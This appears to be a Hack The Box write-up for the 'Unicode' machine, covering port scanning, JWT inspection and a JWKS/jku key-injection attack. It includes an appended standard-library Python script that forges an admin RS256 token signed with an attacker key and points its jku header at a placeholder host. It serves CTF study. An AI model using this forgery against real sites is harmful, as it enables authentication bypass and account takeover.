Today we are going to solve the CTF challenge “Unicode”, an active machine presented by Hack The Box.
IP address: 10.10.11.126. Connect your machine to the HTB VPN:
root@kali:# openvpn <your VPN file name>
Penetration Methodologies
First scan the target for open ports and running services (Nmap):
root@kali:# nmap -Pn -sS -sV -sC 10.10.11.126
As you can observe from the Nmap result, only two ports are open: 22 and 80.
Now open the IP in your web browser. It serves a "Hackmedia" site with Login and Register buttons.
So I registered a user "Reshav ji" with the password "HACKthebox".
Now log in with these credentials; the login succeeds. After login there are three buttons: the first to buy something, the second to upload a PDF report, and the third to log out, which is not important for us.
So let's open Burp Suite and intercept the request and response.
The authentication is a JWT carried in a cookie. Copy the token and decode it at https://jwt.io. The decoded token references a JSON file (jwks.json) that is served by the site, so let's download it:
root@kali:# wget http://10.10.11.126/static/jwks.json
Let's open this file. It is a JSON Web Key Set (JWKS): it holds the server's RSA public key (the kid, n and e fields), not a private key, so by itself it cannot be used to sign tokens. Looking for a JWT vulnerability led to this page: https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens
From that article, the relevant technique is the JWKS/jku attack: the server picks its verification key out of a key set, so if it fetches a key set from a location the token names (the jku header) rather than only its own /static/jwks.json, a token signed with our own private key is accepted. Generate an RSA key pair in PEM form, then derive a new key id (kid) and modulus (n) from its public half with a short Python script. If the jwcrypto library is missing, install it:
root@kali:# pip install jwcrypto
Run the Python script: it prints a kid and an n value. Replace the corresponding values in jwks.json with them, serve the modified file from a location the server can fetch it from, and use the matching private key to create a new JWT for the admin user.
So let's write a short Python script that generates the token. Run it and we get a new authentication cookie.
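Added example (not the write-up's own script, which appears only as screenshots): the whole sequence in pure standard-library Python, so it runs offline without jwcrypto. It generates an attacker RSA key, builds the public JWK with an RFC 7638 thumbprint as kid (the same value jwcrypto's thumbprint() returns), wraps it in a JWKS as a stand-in for the edited jwks.json, signs an RS256 token for an admin claim set, and then checks that token against both the forged JWKS and an unrelated key set that stands in for the site's original /static/jwks.json. The claim names, the jku URL (http://ATTACKER-HOST/jwks.json) and the 1024-bit key size are assumptions for the demo, and the RSA code is minimal and not for production use.

```python
import base64, hashlib, json, math, secrets

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _is_probable_prime(n: int, rounds: int = 16) -> bool:
    # Miller-Rabin: fine for a demo key, not a substitute for a real key generator.
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits: int) -> int:
    while True:
        c = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(c):
            return c

def generate_rsa_key(bits: int = 1024):
    # Returns (n, e, d). 1024 bits keeps the demo fast; use >= 2048 for real keys.
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi)

# DER DigestInfo prefix for SHA-256, as required by PKCS#1 v1.5 (RS256).
_SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")

def _emsa_pkcs1_v15(msg: bytes, k: int) -> int:
    t = _SHA256_PREFIX + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def rs256_sign(msg: bytes, n: int, d: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    return pow(_emsa_pkcs1_v15(msg, k), d, n).to_bytes(k, "big")

def rs256_verify(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    k = (n.bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), e, n) == _emsa_pkcs1_v15(msg, k)

def public_jwk(n: int, e: int) -> dict:
    # Public JWK; kid is the RFC 7638 thumbprint (the value jwcrypto's thumbprint() gives).
    enc = lambda x: b64url(x.to_bytes((x.bit_length() + 7) // 8, "big"))
    jwk = {"kty": "RSA", "use": "sig", "alg": "RS256", "n": enc(n), "e": enc(e)}
    canonical = json.dumps({"e": jwk["e"], "kty": "RSA", "n": jwk["n"]}, separators=(",", ":"))
    jwk["kid"] = b64url(hashlib.sha256(canonical.encode()).digest())
    return jwk

def forge_jwt(claims: dict, jwk: dict, n: int, d: int, jku: str) -> str:
    # Sign with our private key; the header names our kid and the JWKS URL we host.
    compact = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = compact({"alg": "RS256", "typ": "JWT", "kid": jwk["kid"], "jku": jku}) + "." + compact(claims)
    return signing_input + "." + b64url(rs256_sign(signing_input.encode(), n, d))

def verify_jwt(token: str, jwks: dict):
    # Model of the server side: pick the key by kid from a JWKS and check the signature.
    h64, p64, s64 = token.split(".")
    header = json.loads(b64url_decode(h64))
    key = next((k for k in jwks["keys"] if k.get("kid") == header.get("kid")), None)
    if key is None or header.get("alg") != "RS256":
        return None
    n, e = (int.from_bytes(b64url_decode(key[f]), "big") for f in ("n", "e"))
    if not rs256_verify((h64 + "." + p64).encode(), b64url_decode(s64), n, e):
        return None
    return json.loads(b64url_decode(p64))

def demo():
    # Attacker key -> forged jwks.json -> admin token; the site's own JWKS must reject it.
    n, e, d = generate_rsa_key()
    my_jwk = public_jwk(n, e)
    forged_jwks = {"keys": [my_jwk]}                       # what we would host as jwks.json
    site_n, site_e, _ = generate_rsa_key()                 # stands in for /static/jwks.json
    site_jwks = {"keys": [public_jwk(site_n, site_e)]}
    # Claim names below are assumed; the real cookie's payload is not shown on the page.
    token = forge_jwt({"user": "admin"}, my_jwk, n, d, "http://ATTACKER-HOST/jwks.json")
    return verify_jwt(token, forged_jwks), verify_jwt(token, site_jwks), forged_jwks

if __name__ == "__main__":
    accepted, rejected, jwks = demo()
    print(json.dumps(jwks, indent=2))
    print("forged JWKS accepts:", accepted, "| site's JWKS accepts:", rejected)
```

The last two return values of demo() are the point: the same token is accepted when the server resolves the kid against the key set we publish, and rejected when it only consults its own jwks.json. In the box, the part that remains is getting the target to fetch the forged file, which is where the jku header comes in.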